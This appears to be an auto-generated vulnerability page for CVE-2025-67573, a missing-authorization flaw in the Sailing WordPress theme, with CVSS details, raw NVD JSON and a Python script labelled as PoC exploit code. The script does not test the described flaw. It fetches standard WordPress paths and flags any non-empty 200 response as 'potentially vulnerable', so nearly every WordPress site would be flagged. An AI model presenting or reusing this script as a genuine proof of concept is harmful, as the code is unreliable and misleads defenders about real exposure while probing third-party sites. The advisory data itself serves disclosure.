Security Vulnerability Report
中文
CVE-2025-67573 CVSS 5.3 MEDIUM

CVE-2025-67573

Published: 2025-12-09 16:18:34
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in ThimPress Sailing sailing allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sailing: from n/a through < 4.4.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Sailing < 4.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67573 PoC - Missing Authorization in Sailing Theme # Target: WordPress site with Sailing theme < 4.4.6 import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-67573 Missing Authorization in Sailing theme """ # Common Sailing theme endpoints that should require authorization vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/', '/wp-content/themes/sailing/', ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-67573 - Missing Authorization in Sailing Theme") for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) print(f"\n[+] Endpoint: {endpoint}") print(f" Status: {response.status_code}") print(f" Response Length: {len(response.text)}") # Check if unauthorized access is possible if response.status_code == 200 and len(response.text) > 0: print(f" [!] Potentially vulnerable - returned data without auth") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") print("\n[*] Note: This PoC demonstrates the potential for unauthorized access.") print("[*] Full exploitation requires identifying specific vulnerable functions.") print("[*] Recommended: Upgrade Sailing theme to version 4.4.6 or later.") if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67573", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:34.390", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in ThimPress Sailing sailing allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sailing: from n/a through < 4.4.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/sailing/vulnerability/wordpress-sailing-theme-4-4-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}